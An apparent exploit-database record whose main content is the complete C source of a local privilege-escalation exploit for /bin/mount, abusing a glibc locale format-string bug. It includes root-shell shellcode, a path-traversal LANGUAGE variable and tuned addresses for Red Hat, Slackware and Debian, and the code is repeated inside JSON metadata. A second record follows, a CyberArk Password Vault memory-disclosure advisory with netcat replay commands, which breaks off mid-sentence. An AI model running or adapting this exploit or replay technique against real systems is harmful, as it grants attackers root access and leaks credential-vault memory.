ID 1337DAY-ID-7264 Type zdt Reporter sk8 Modified 2000-12-02T00:00:00
Description
Exploit for linux platform in category local exploits
==================================
mount exploit for glibc locale bug
==================================
/*
* mount exploit for glibc locale bug
* tested on redhat 6.2 and slackware 7.0 and debian 2.2
*
* Debian 2.2 (mount-2.10f) : ./mnt -n 136 -a 0x080589a0 -i 192
* Redhat 6.2 (mount-2.10f) : ./mnt -n 114 -a 0x080565dc -i 112
* compiled on rh 6.2 (mount-2.10m): ./mnt -n 114 -a 0x08059218 -i 112
*
* "objdump /bin/mount | grep exit" to get the -a address
*
* - sk8
*/
#include <unistd.h>
#include <stdio.h>
#include <fcntl.h>
char sc[]=
/* main: */ /* setreuid(0, 0); */
"\x29\xc0" /* subl %eax, %eax */
"\xb0\x46" /* movb $70, %al */
"\x29\xdb" /* subl %ebx, %ebx */
"\xb3\x0c" /* movb $12, %bl */
"\x80\xeb\x0c" /* subb $12, %bl */
"\x89\xd9" /* movl %ebx, %ecx */
"\xcd\x80" /* int $0x80 */
"\xeb\x18" /* jmp callz */
/* start: */ /* execve of /bin/sh */
"\x5e" /* popl %esi */
"\x29\xc0" /* subl %eax, %eax */
"\x88\x46\x07" /* movb %al, 0x07(%esi) */
"\x89\x46\x0c" /* movl %eax, 0x0c(%esi) */
"\x89\x76\x08" /* movl %esi, 0x08(%esi) */
"\xb0\x0b" /* movb $0x0b, %al */
"\x87\xf3" /* xchgl %esi, %ebx */
"\x8d\x4b\x08" /* leal 0x08(%ebx), %ecx */
"\x8d\x53\x0c" /* leal 0x0c(%ebx), %edx */
"\xcd\x80" /* int $0x80 */
/* callz: */
"\xe8\xe3\xff\xff\xff" /* call start */
/* /bin/sh */
"\x2f\x62\x69\x6e\x2f\x73\x68";
int main(int argc, char** argv) {
FILE* fp;
int numnops=10080;
char buffer[20000], fmtbuf[1000], numbuf[2000];
int shloc=0xbfffdaa0;
int i=0, c=0;
char mode='n';
int debug=0;
int eiploc=0xbffffdc0;
char* envbuf[2];
int inc=112;
int epad=-1, bpad=0;
int s=0;
int nump=114;
int num[4];
char xpath[128];
char* heapaddr=(char*)malloc(200);
memset(xpath, 0, strlen(xpath));
memset(buffer, 0, sizeof(buffer));
memset(fmtbuf, 0, sizeof(fmtbuf));
memset(numbuf, 0, sizeof(numbuf));
printf("heapaddr: 0x%x\n", heapaddr);
c=0;
strcpy (xpath, "/bin/mount");
while ((s=getopt(argc, argv, "p:s:b:e:a:n:i:d")) != EOF) {
switch(s) {
case 's': shloc=strtoul(optarg, 0, 0); break;
case 'b': bpad=atoi(optarg); break;
case 'e': epad=atoi(optarg); break;
case 'a': eiploc=strtoul(optarg, 0, 0); break;
case 'n': nump=atoi(optarg); break;
case 'i': inc=atoi(optarg); break;
case 'p': strcpy(xpath, optarg); break;
case 'd': debug=1; break;
default:
}
}
if (epad < 0) epad=10-strlen(xpath)%16;
if (epad < 0) epad+=16;
for (i=0; i < nump; i++) {
buffer[c++]='%';
buffer[c++]='8';
buffer[c++]='x';
}
if (debug) { mode='p';
strcpy(sc, "AAAA");
numnops=0;
}
printf("cur strlen: %i\n", strlen(buffer));
/* size of executed program (/bin/mount) does not seem to affect these calculations
it does affect location of eip however, (which is why its nice to just overwrite exit
it also affects epadding, but that is calculated based on executed program size
*/
num[0]=(shloc & 0xff)+inc; /* why 23? 114/4 - 5 */
if (num[0] < 0) num[0]+=256;
num[1]=((shloc >> 8) & 0xff)-(shloc & 0xff);
if (num[1] < 0) num[1]+=256;
num[2]=((shloc >> 16) & 0xff)+0x100-((shloc >> 8)&0xff);
if (num[2] < 0) num[2]+=256;
num[3]=((shloc >> 24) & 0xff)+1;
if (num[3] < 0) num[3]+=256;
sprintf(fmtbuf, "%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c", num[0]
, mode, num[1], mode, num[2], mode, num[3], mode);
printf("fmtbuf: %s\n", fmtbuf);
printf("strlen(fmtbuf): %i\n", strlen(fmtbuf));
memcpy(buffer+strlen(buffer), fmtbuf, strlen(fmtbuf));
memset(buffer+strlen(buffer), 0x90, numnops);
memcpy(buffer+strlen(buffer), sc, strlen(sc));
mkdir("/tmp/sk8", 0755);
mkdir("/tmp/sk8/LC_MESSAGES", 0755);
if ( ! (fp=fopen("/tmp/sk8/LC_MESSAGES/libc.po", "w") ) ) {
printf("could not create bad libc.po\n");
exit(-1);
}
fprintf(fp, "msgid \"%%s: unrecognized option `--%%s'\\n\"\n");
fprintf(fp, "msgstr \"%s\\n\"", buffer);
fclose(fp);
system("msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo");
c=0;
numbuf[c++]='-';
numbuf[c++]='-';
memset(numbuf+strlen(numbuf), 'B', bpad);
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
*(long*)(numbuf+strlen(numbuf))=eiploc;
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
*(long*)(numbuf+strlen(numbuf))=eiploc+1;
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
*(long*)(numbuf+strlen(numbuf))=eiploc+2;
memcpy(numbuf+strlen(numbuf), "PPPP", 4);
*(long*)(numbuf+strlen(numbuf))=eiploc+3;
printf("cur numbuf length: %i\n", strlen(numbuf));
memset(numbuf+strlen(numbuf), 'Z', epad);
printf("cur numbuf length: %i\n", strlen(numbuf));
envbuf[0]="LANGUAGE=en_GB/../../../../tmp/sk8/";
envbuf[1]=0;
printf("strlen(numbuf): %i\n", strlen(numbuf));
printf("bpad: %i; epad: %i\n", bpad, epad);
printf("number of %%p's to traverse stack: %i\n", nump);
printf("address of eip: 0x%x\n", eiploc);
printf("inc: %i\n", inc);
execle(xpath, "mount", numbuf, 0, envbuf);
}
# 0day.today [2018-04-11] #
{"hash": "322b350f1f68a9ef26a25e752b65332835106d004264a30b841f53cd24618f7e", "id": "1337DAY-ID-7264", "lastseen": "2018-04-11T15:03:37", "viewCount": 0, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "390bd03ad1425f7e30120e484c05e905", "key": "href"}, {"hash": "f53ccc439fc0704884a253fba3f860b6", "key": "modified"}, {"hash": "f53ccc439fc0704884a253fba3f860b6", "key": "published"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "046bb8d33079e493d04a7a21e5ce3bba", "key": "reporter"}, {"hash": "562f874077d9cb02568fd68c292177e6", "key": "sourceData"}, {"hash": "8d3384eaf5b12ae2eee48ab5c9611aef", "key": "sourceHref"}, {"hash": "e091b57809e81a585b5755ec3ed3c9f1", "key": "title"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}], "bulletinFamily": "exploit", "cvss": {"score": 0.0, "vector": "NONE"}, "edition": 2, "enchantments": {"score": {"value": 7.5, "vector": "NONE"}, "vulnersScore": 7.5}, "type": "zdt", "sourceHref": "https://0day.today/exploit/7264", "description": "Exploit for linux platform in category local exploits", "title": "mount exploit for glibc locale bug", "history": [{"bulletin": {"hash": "4efb6eeaa87af344491ae9f4d3060b759f3b802fcef0f0ae7bc85e3156ee2a00", "id": "1337DAY-ID-7264", "lastseen": "2016-04-20T00:06:50", "enchantments": {"score": {"value": 2.8, "vector": "AV:N/AC:M/Au:M/C:P/I:N/A:N/", "modified": "2016-04-20T00:06:50"}}, "hashmap": [{"hash": "708697c63f7eb369319c6523380bdf7a", "key": "bulletinFamily"}, {"hash": "0678144464852bba10aa2eddf3783f0a", "key": "type"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "references"}, {"hash": "f53ccc439fc0704884a253fba3f860b6", "key": "modified"}, {"hash": "046bb8d33079e493d04a7a21e5ce3bba", "key": "reporter"}, {"hash": "19228451f8cd9f393544a97253463f04", "key": "href"}, {"hash": "8be7a8b03e0d0b6e92b55fa1f40b9528", "key": "description"}, {"hash": "d41d8cd98f00b204e9800998ecf8427e", "key": "cvelist"}, {"hash": "f53ccc439fc0704884a253fba3f860b6", "key": "published"}, {"hash": "ee68cabeba6d43d590b0d6475c88d74d", "key": "sourceHref"}, {"hash": "8cd4821cb504d25572038ed182587d85", "key": "cvss"}, {"hash": "e091b57809e81a585b5755ec3ed3c9f1", "key": "title"}, {"hash": "65ae2b74ec38ecbd510d8a7760cf5c96", "key": "sourceData"}], "bulletinFamily": "exploit", "history": [], "edition": 1, "type": "zdt", "sourceHref": "http://0day.today/exploit/7264", "description": "Exploit for linux platform in category local exploits", "viewCount": 0, "title": "mount exploit for glibc locale bug", "cvss": {"score": 0.0, "vector": "NONE"}, "objectVersion": "1.0", "cvelist": [], "sourceData": "==================================\r\nmount exploit for glibc locale bug\r\n==================================\r\n\r\n\r\n/*\r\n * mount exploit for glibc locale bug \r\n * tested on redhat 6.2 and slackware 7.0 and debian 2.2\r\n *\r\n * Debian 2.2 (mount-2.10f) : ./mnt -n 136 -a 0x080589a0 -i 192\r\n * Redhat 6.2 (mount-2.10f) : ./mnt -n 114 -a 0x080565dc -i 112\r\n * compiled on rh 6.2 (mount-2.10m): ./mnt -n 114 -a 0x08059218 -i 112\r\n *\r\n * \"objdump /bin/mount | grep exit\" to get the -a address\r\n *\r\n * - sk8\r\n */\r\n\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n\r\nchar sc[]=\r\n /* main: */ /* setreuid(0, 0); */\r\n \"\\x29\\xc0\" /* subl %eax, %eax */\r\n \"\\xb0\\x46\" /* movb $70, %al */\r\n \"\\x29\\xdb\" /* subl %ebx, %ebx */\r\n \"\\xb3\\x0c\" /* movb $12, %bl */\r\n \"\\x80\\xeb\\x0c\" /* subb $12, %bl */\r\n \"\\x89\\xd9\" /* movl %ebx, %ecx */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\xeb\\x18\" /* jmp callz */\r\n\r\n /* start: */ /* execve of /bin/sh */\r\n \"\\x5e\" /* popl %esi */\r\n \"\\x29\\xc0\" /* subl %eax, %eax */\r\n \"\\x88\\x46\\x07\" /* movb %al, 0x07(%esi) */\r\n \"\\x89\\x46\\x0c\" /* movl %eax, 0x0c(%esi) */\r\n \"\\x89\\x76\\x08\" /* movl %esi, 0x08(%esi) */\r\n \"\\xb0\\x0b\" /* movb $0x0b, %al */\r\n \"\\x87\\xf3\" /* xchgl %esi, %ebx */\r\n \"\\x8d\\x4b\\x08\" /* leal 0x08(%ebx), %ecx */\r\n \"\\x8d\\x53\\x0c\" /* leal 0x0c(%ebx), %edx */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n\r\n /* callz: */\r\n \"\\xe8\\xe3\\xff\\xff\\xff\" /* call start */\r\n\r\n /* /bin/sh */\r\n \"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\";\r\n\r\nint main(int argc, char** argv) {\r\n FILE* fp;\r\n int numnops=10080;\r\n char buffer[20000], fmtbuf[1000], numbuf[2000];\r\n int shloc=0xbfffdaa0;\r\n int i=0, c=0; \r\n char mode='n';\r\n int debug=0;\r\n int eiploc=0xbffffdc0;\r\n char* envbuf[2];\r\n int inc=112;\r\n int epad=-1, bpad=0;\r\n int s=0; \r\n int nump=114;\r\n int num[4];\r\n char xpath[128];\r\n char* heapaddr=(char*)malloc(200); \r\n memset(xpath, 0, strlen(xpath));\r\n memset(buffer, 0, sizeof(buffer));\r\n memset(fmtbuf, 0, sizeof(fmtbuf));\r\n memset(numbuf, 0, sizeof(numbuf));\r\n printf(\"heapaddr: 0x%x\\n\", heapaddr);\r\n c=0;\r\n strcpy (xpath, \"/bin/mount\");\r\n\r\n while ((s=getopt(argc, argv, \"p:s:b:e:a:n:i:d\")) != EOF) {\r\n switch(s) {\r\n case 's': shloc=strtoul(optarg, 0, 0); break;\r\n case 'b': bpad=atoi(optarg); break;\r\n case 'e': epad=atoi(optarg); break;\r\n case 'a': eiploc=strtoul(optarg, 0, 0); break;\r\n case 'n': nump=atoi(optarg); break;\r\n case 'i': inc=atoi(optarg); break;\r\n case 'p': strcpy(xpath, optarg); break;\r\n case 'd': debug=1; break;\r\n default: \r\n }\r\n }\r\n\r\n if (epad < 0) epad=10-strlen(xpath)%16;\r\n if (epad < 0) epad+=16;\r\n\r\n for (i=0; i < nump; i++) {\r\n buffer[c++]='%';\r\n buffer[c++]='8';\r\n buffer[c++]='x';\r\n }\r\n\r\n if (debug) { mode='p';\r\n strcpy(sc, \"AAAA\");\r\n numnops=0;\r\n }\r\n printf(\"cur strlen: %i\\n\", strlen(buffer));\r\n\r\n /* size of executed program (/bin/mount) does not seem to affect these calculations\r\n it does affect location of eip however, (which is why its nice to just overwrite exit \r\n it also affects epadding, but that is calculated based on executed program size\r\n */\r\n num[0]=(shloc & 0xff)+inc; /* why 23? 114/4 - 5 */\r\n if (num[0] < 0) num[0]+=256;\r\n num[1]=((shloc >> 8) & 0xff)-(shloc & 0xff);\r\n if (num[1] < 0) num[1]+=256;\r\n num[2]=((shloc >> 16) & 0xff)+0x100-((shloc >> 8)&0xff);\r\n if (num[2] < 0) num[2]+=256;\r\n num[3]=((shloc >> 24) & 0xff)+1;\r\n if (num[3] < 0) num[3]+=256;\r\n\r\n sprintf(fmtbuf, \"%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c\", num[0]\r\n , mode, num[1], mode, num[2], mode, num[3], mode);\r\n printf(\"fmtbuf: %s\\n\", fmtbuf);\r\n printf(\"strlen(fmtbuf): %i\\n\", strlen(fmtbuf));\r\n memcpy(buffer+strlen(buffer), fmtbuf, strlen(fmtbuf));\r\n\r\n memset(buffer+strlen(buffer), 0x90, numnops);\r\n memcpy(buffer+strlen(buffer), sc, strlen(sc));\r\n \r\n mkdir(\"/tmp/sk8\", 0755);\r\n mkdir(\"/tmp/sk8/LC_MESSAGES\", 0755);\r\n if ( ! (fp=fopen(\"/tmp/sk8/LC_MESSAGES/libc.po\", \"w\") ) ) {\r\n printf(\"could not create bad libc.po\\n\");\r\n exit(-1);\r\n } \r\n fprintf(fp, \"msgid \\\"%%s: unrecognized option `--%%s'\\\\n\\\"\\n\");\r\n fprintf(fp, \"msgstr \\\"%s\\\\n\\\"\", buffer);\r\n fclose(fp);\r\n\r\n system(\"msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo\");\r\n\r\n c=0;\r\n numbuf[c++]='-';\r\n numbuf[c++]='-';\r\n \r\n memset(numbuf+strlen(numbuf), 'B', bpad);\r\n \r\n memcpy(numbuf+strlen(numbuf), \"PPPP\", 4);\r\n *(long*)(numbuf+strlen(numbuf))=eiploc;\r\n\r\n memcpy(numbuf+strlen(numbuf), \"PPPP\", 4);\r\n *(long*)(numbuf+strlen(numbuf))=eiploc+1;\r\n\r\n memcpy(numbuf+strlen(numbuf), \"PPPP\", 4);\r\n *(long*)(numbuf+strlen(numbuf))=eiploc+2;\r\n\r\n memcpy(numbuf+strlen(numbuf), \"PPPP\", 4);\r\n *(long*)(numbuf+strlen(numbuf))=eiploc+3;\r\n printf(\"cur numbuf length: %i\\n\", strlen(numbuf));\r\n memset(numbuf+strlen(numbuf), 'Z', epad);\r\n printf(\"cur numbuf length: %i\\n\", strlen(numbuf));\r\n\r\n envbuf[0]=\"LANGUAGE=en_GB/../../../../tmp/sk8/\";\r\n envbuf[1]=0;\r\n\r\n printf(\"strlen(numbuf): %i\\n\", strlen(numbuf));\r\n printf(\"bpad: %i; epad: %i\\n\", bpad, epad); \r\n printf(\"number of %%p's to traverse stack: %i\\n\", nump);\r\n printf(\"address of eip: 0x%x\\n\", eiploc);\r\n printf(\"inc: %i\\n\", inc);\r\n\r\n execle(xpath, \"mount\", numbuf, 0, envbuf); \r\n}\r\n\r\n\r\n\n# 0day.today [2016-04-19] #", "published": "2000-12-02T00:00:00", "references": [], "reporter": "sk8", "modified": "2000-12-02T00:00:00", "href": "http://0day.today/exploit/description/7264"}, "lastseen": "2016-04-20T00:06:50", "edition": 1, "differentElements": ["sourceHref", "sourceData", "href"]}], "objectVersion": "1.3", "cvelist": [], "sourceData": "==================================\r\nmount exploit for glibc locale bug\r\n==================================\r\n\r\n\r\n/*\r\n * mount exploit for glibc locale bug \r\n * tested on redhat 6.2 and slackware 7.0 and debian 2.2\r\n *\r\n * Debian 2.2 (mount-2.10f) : ./mnt -n 136 -a 0x080589a0 -i 192\r\n * Redhat 6.2 (mount-2.10f) : ./mnt -n 114 -a 0x080565dc -i 112\r\n * compiled on rh 6.2 (mount-2.10m): ./mnt -n 114 -a 0x08059218 -i 112\r\n *\r\n * \"objdump /bin/mount | grep exit\" to get the -a address\r\n *\r\n * - sk8\r\n */\r\n\r\n#include <unistd.h>\r\n#include <stdio.h>\r\n#include <fcntl.h>\r\n\r\nchar sc[]=\r\n /* main: */ /* setreuid(0, 0); */\r\n \"\\x29\\xc0\" /* subl %eax, %eax */\r\n \"\\xb0\\x46\" /* movb $70, %al */\r\n \"\\x29\\xdb\" /* subl %ebx, %ebx */\r\n \"\\xb3\\x0c\" /* movb $12, %bl */\r\n \"\\x80\\xeb\\x0c\" /* subb $12, %bl */\r\n \"\\x89\\xd9\" /* movl %ebx, %ecx */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n \"\\xeb\\x18\" /* jmp callz */\r\n\r\n /* start: */ /* execve of /bin/sh */\r\n \"\\x5e\" /* popl %esi */\r\n \"\\x29\\xc0\" /* subl %eax, %eax */\r\n \"\\x88\\x46\\x07\" /* movb %al, 0x07(%esi) */\r\n \"\\x89\\x46\\x0c\" /* movl %eax, 0x0c(%esi) */\r\n \"\\x89\\x76\\x08\" /* movl %esi, 0x08(%esi) */\r\n \"\\xb0\\x0b\" /* movb $0x0b, %al */\r\n \"\\x87\\xf3\" /* xchgl %esi, %ebx */\r\n \"\\x8d\\x4b\\x08\" /* leal 0x08(%ebx), %ecx */\r\n \"\\x8d\\x53\\x0c\" /* leal 0x0c(%ebx), %edx */\r\n \"\\xcd\\x80\" /* int $0x80 */\r\n\r\n /* callz: */\r\n \"\\xe8\\xe3\\xff\\xff\\xff\" /* call start */\r\n\r\n /* /bin/sh */\r\n \"\\x2f\\x62\\x69\\x6e\\x2f\\x73\\x68\";\r\n\r\nint main(int argc, char** argv) {\r\n FILE* fp;\r\n int numnops=10080;\r\n char buffer[20000], fmtbuf[1000], numbuf[2000];\r\n int shloc=0xbfffdaa0;\r\n int i=0, c=0; \r\n char mode='n';\r\n int debug=0;\r\n int eiploc=0xbffffdc0;\r\n char* envbuf[2];\r\n int inc=112;\r\n int epad=-1, bpad=0;\r\n int s=0; \r\n int nump=114;\r\n int num[4];\r\n char xpath[128];\r\n char* heapaddr=(char*)malloc(200); \r\n memset(xpath, 0, strlen(xpath));\r\n memset(buffer, 0, sizeof(buffer));\r\n memset(fmtbuf, 0, sizeof(fmtbuf));\r\n memset(numbuf, 0, sizeof(numbuf));\r\n printf(\"heapaddr: 0x%x\\n\", heapaddr);\r\n c=0;\r\n strcpy (xpath, \"/bin/mount\");\r\n\r\n while ((s=getopt(argc, argv, \"p:s:b:e:a:n:i:d\")) != EOF) {\r\n switch(s) {\r\n case 's': shloc=strtoul(optarg, 0, 0); break;\r\n case 'b': bpad=atoi(optarg); break;\r\n case 'e': epad=atoi(optarg); break;\r\n case 'a': eiploc=strtoul(optarg, 0, 0); break;\r\n case 'n': nump=atoi(optarg); break;\r\n case 'i': inc=atoi(optarg); break;\r\n case 'p': strcpy(xpath, optarg); break;\r\n case 'd': debug=1; break;\r\n default: \r\n }\r\n }\r\n\r\n if (epad < 0) epad=10-strlen(xpath)%16;\r\n if (epad < 0) epad+=16;\r\n\r\n for (i=0; i < nump; i++) {\r\n buffer[c++]='%';\r\n buffer[c++]='8';\r\n buffer[c++]='x';\r\n }\r\n\r\n if (debug) { mode='p';\r\n strcpy(sc, \"AAAA\");\r\n numnops=0;\r\n }\r\n printf(\"cur strlen: %i\\n\", strlen(buffer));\r\n\r\n /* size of executed program (/bin/mount) does not seem to affect these calculations\r\n it does affect location of eip however, (which is why its nice to just overwrite exit \r\n it also affects epadding, but that is calculated based on executed program size\r\n */\r\n num[0]=(shloc & 0xff)+inc; /* why 23? 114/4 - 5 */\r\n if (num[0] < 0) num[0]+=256;\r\n num[1]=((shloc >> 8) & 0xff)-(shloc & 0xff);\r\n if (num[1] < 0) num[1]+=256;\r\n num[2]=((shloc >> 16) & 0xff)+0x100-((shloc >> 8)&0xff);\r\n if (num[2] < 0) num[2]+=256;\r\n num[3]=((shloc >> 24) & 0xff)+1;\r\n if (num[3] < 0) num[3]+=256;\r\n\r\n sprintf(fmtbuf, \"%%%id%%h%c%%%id%%h%c%%%id%%h%c%%%id%%h%c\", num[0]\r\n , mode, num[1], mode, num[2], mode, num[3], mode);\r\n printf(\"fmtbuf: %s\\n\", fmtbuf);\r\n printf(\"strlen(fmtbuf): %i\\n\", strlen(fmtbuf));\r\n memcpy(buffer+strlen(buffer), fmtbuf, strlen(fmtbuf));\r\n\r\n memset(buffer+strlen(buffer), 0x90, numnops);\r\n memcpy(buffer+strlen(buffer), sc, strlen(sc));\r\n \r\n mkdir(\"/tmp/sk8\", 0755);\r\n mkdir(\"/tmp/sk8/LC_MESSAGES\", 0755);\r\n if ( ! (fp=fopen(\"/tmp/sk8/LC_MESSAGES/libc.po\", \"w\") ) ) {\r\n printf(\"could not create bad libc.po\\n\");\r\n exit(-1);\r\n } \r\n fprintf(fp, \"msgid \\\"%%s: unrecognized option `--%%s'\\\\n\\\"\\n\");\r\n fprintf(fp, \"msgstr \\\"%s\\\\n\\\"\", buffer);\r\n fclose(fp);\r\n\r\n system(\"msgfmt /tmp/sk8/LC_MESSAGES/libc.po -o /tmp/sk8/LC_MESSAGES/libc.mo\");\r\n\r\n c=0;\r\n numbuf[c++]='-';\r\n numbuf[c++]='-';\r\n \r\n memset(numbuf+strlen(numbuf), 'B', bpad);\r\n \r\n memcpy(numbuf+strlen(numbuf), \"PPPP\", 4);\r\n *(long*)(numbuf+strlen(numbuf))=eiploc;\r\n\r\n memcpy(numbuf+strlen(numbuf), \"PPPP\", 4);\r\n *(long*)(numbuf+strlen(numbuf))=eiploc+1;\r\n\r\n memcpy(numbuf+strlen(numbuf), \"PPPP\", 4);\r\n *(long*)(numbuf+strlen(numbuf))=eiploc+2;\r\n\r\n memcpy(numbuf+strlen(numbuf), \"PPPP\", 4);\r\n *(long*)(numbuf+strlen(numbuf))=eiploc+3;\r\n printf(\"cur numbuf length: %i\\n\", strlen(numbuf));\r\n memset(numbuf+strlen(numbuf), 'Z', epad);\r\n printf(\"cur numbuf length: %i\\n\", strlen(numbuf));\r\n\r\n envbuf[0]=\"LANGUAGE=en_GB/../../../../tmp/sk8/\";\r\n envbuf[1]=0;\r\n\r\n printf(\"strlen(numbuf): %i\\n\", strlen(numbuf));\r\n printf(\"bpad: %i; epad: %i\\n\", bpad, epad); \r\n printf(\"number of %%p's to traverse stack: %i\\n\", nump);\r\n printf(\"address of eip: 0x%x\\n\", eiploc);\r\n printf(\"inc: %i\\n\", inc);\r\n\r\n execle(xpath, \"mount\", numbuf, 0, envbuf); \r\n}\r\n\r\n\r\n\n# 0day.today [2018-04-11] #", "published": "2000-12-02T00:00:00", "references": [], "reporter": "sk8", "modified": "2000-12-02T00:00:00", "href": "https://0day.today/exploit/description/7264"}
{"zdt": [{"lastseen": "2018-04-11T11:46:23", "references": [], "description": "Exploit for linux platform in category dos / poc", "edition": 1, "reporter": "RedTeam", "published": "2018-04-09T00:00:00", "type": "zdt", "title": "CyberArk Password Vault < 9.7 / < 10 - Memory Disclosure Vulnerability", "enchantments": {"score": {"vector": "NONE", "value": 5.0}}, "bulletinFamily": "exploit", "cvelist": ["CVE-2018-9842"], "modified": "2018-04-09T00:00:00", "href": "https://0day.today/exploit/description/30138", "id": "1337DAY-ID-30138", "sourceData": "Advisory: CyberArk Password Vault Memory Disclosure\r\n \r\nData in the CyberArk Password Vault may be accessed through a proprietary\r\nnetwork protocol. While answering to a client's logon request, the vault\r\ndiscloses around 50 bytes of its memory to the client.\r\n \r\n \r\nDetails\r\n=======\r\n \r\nProduct: CyberArk Password Vault\r\nAffected Versions: < 9.7, < 10\r\nFixed Versions: 9.7, 10\r\nVulnerability Type: Information Disclosure\r\nSecurity Risk: high\r\nVendor URL: https://www.cyberark.com/\r\nVendor Status: fixed version released\r\nAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2017-015\r\nAdvisory Status: published\r\nCVE: CVE-2018-9842\r\nCVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9842\r\n \r\n \r\nIntroduction\r\n============\r\n \r\n\"CyberArk Enterprise Password Vault is designed to secure, rotate and\r\ncontrol access to privileged account credentials based on organizational\r\npolicies. A flexible architecture allows organizations to start small\r\nand scale to the largest, most complex IT environments. The solution\r\nprotects privileged account credentials used to access the vast majority\r\nof systems.\"\r\n(from the Enterprise Password Vault Data Sheet [1])\r\n \r\n \r\nMore Details\r\n============\r\n \r\nThe CyberArk Password Vault serves as a database to securely store\r\ncredentials. Furthermore, the vault enforces access controls and logs\r\naccess to its records. Data stored in the vault may be accessed through\r\na proprietary network protocol which is usually transmitted over TCP\r\nport 1858. Various clients, such as web applications or command line\r\ntools, are provided by CyberArk to interface with a vault.\r\n \r\nThe first message a client sends to the vault is a \"Logon\" command.\r\nUsing a network sniffer, such a message was captured:\r\n \r\n$ xxd logon.bin\r\n00000000: ffff ffff f700 0000 ffff ffff 3d01 0000 ............=...\r\n00000010: 5061 636c 6953 6372 6970 7455 7365 7200 PacliScriptUser.\r\n00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000060: 0000 0000 0000 0000 0000 0000 0020 2020 .............\r\n00000070: 20ff ffff ff00 0000 0000 0000 0000 0073 ..............s\r\n00000080: 0000 00ce cece ce00 0000 0000 0000 0000 ................\r\n00000090: 0000 0000 0000 0030 3d4c 6f67 6f6e fd31 .......0=Logon.1\r\n000000a0: 3135 3d37 2e32 302e 3930 2e32 38fd 3639 15=7.20.90.28.69\r\n000000b0: 3d50 fd31 3136 3d30 fd31 3030 3dfd 3231 =P.116=0.100=.21\r\n000000c0: 373d 59fd 3231 383d 5041 434c 49fd 3231 7=Y.218=PACLI.21\r\n000000d0: 393d fd33 3137 3d30 fd33 3537 3d30 fd32 9=.317=0.357=0.2\r\n000000e0: 323d 5061 636c 6953 6372 6970 7455 7365 2=PacliScriptUse\r\n000000f0: 72fd 3336 373d 3330 fd00 00 r.367=30...\r\n \r\nStarting at offset 0x97, a type of remote procedure call can be\r\nidentified. In this case, \"Logon\" is invoked for the user\r\n\"PacliScriptUser\". This message does not contain any random,\r\nunpredictable data. Therefore, it may be replayed at will once captured.\r\nThis can be accomplished using netcat:\r\n \r\n------------------------------------------------------------------------\r\n$ cat logon.bin | nc -v 10.0.0.5 1858\r\n------------------------------------------------------------------------\r\n \r\nRedTeam Pentesting discovered that the message sent by the vault in\r\nresponse to a \"Logon\" command contains about 50 bytes of the vault's\r\nmemory.\r\n \r\n \r\nProof of Concept\r\n================\r\n \r\nTo trigger the vulnerability, a previously captured logon message is\r\nsent to the vault using netcat:\r\n \r\n------------------------------------------------------------------------\r\n$ cat logon.bin | nc -v 10.0.0.5 1858 | xxd\r\nNcat: Version 7.40 ( https://nmap.org/ncat )\r\nNcat: Connected to 10.0.0.5:1858.\r\nNcat: 251 bytes sent, 273 bytes received in 0.01 seconds.\r\n00000000: e500 0000 0000 0000 3001 0000 5061 636c ........0...Pacl\r\n00000010: 6953 6372 6970 7455 7365 7200 0000 0000 iScriptUser.....\r\n00000020: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000030: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000040: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000050: 0000 0000 0000 0000 0000 0000 0000 0000 ................\r\n00000060: 0000 0000 0000 0000 0000 0000 001e 0200 ................\r\n00000070: 0078 9c53 6362 0003 7616 0686 ff40 e019 [email\u00a0protected]\r\n00000080: e2e8 ec6b 6069 eaaa 1052 9498 579c 985c ...k`i...R..W..\\\r\n00000090: 9299 9fa7 e093 9f0e 248b b333 0b0a 5253 ........$..3..RS\r\n000000a0: 14d2 f28b 144a 8b53 8b14 0212 9373 3283 .....J.S.....s2.\r\n000000b0: 938b 320b 4a42 817c 3d85 a0d4 c4e2 fc3c ..2.JB.|=......<\r\n000000c0: 2b05 a070 6a5e 8942 717e 7276 6a89 4266 +..pj^.Bq~rvj.Bf\r\n000000d0: 3150 20bf 3835 458f 8b61 140c 15c0 08c4 1P .85E..a......\r\n000000e0: 0063 0e25 c06d 6265 7220 3d20 7661 756c .c.%.mber = vaul\r\n000000f0: 745f 6669 6c65 5f63 6174 6567 6f72 6965 t_file_categorie\r\n00000100: 735f 7265 636f 7264 7300 2968 b8fb aae9 s_records.)h....\r\n00000110: 62\r\n------------------------------------------------------------------------\r\n \r\nStarting at offset 0xe0, the vault discloses a total of 49 bytes of its\r\nmemory to the client.\r\n \r\n \r\nWorkaround\r\n==========\r\n \r\nNone\r\n \r\n \r\nFix\r\n===\r\n \r\nUpgrade CyberArk Password Vault to version 9.7 or 10.\r\n \r\n \r\nSecurity Risk\r\n=============\r\n \r\nThis vulnerability is rated as a high risk. Exploitation only 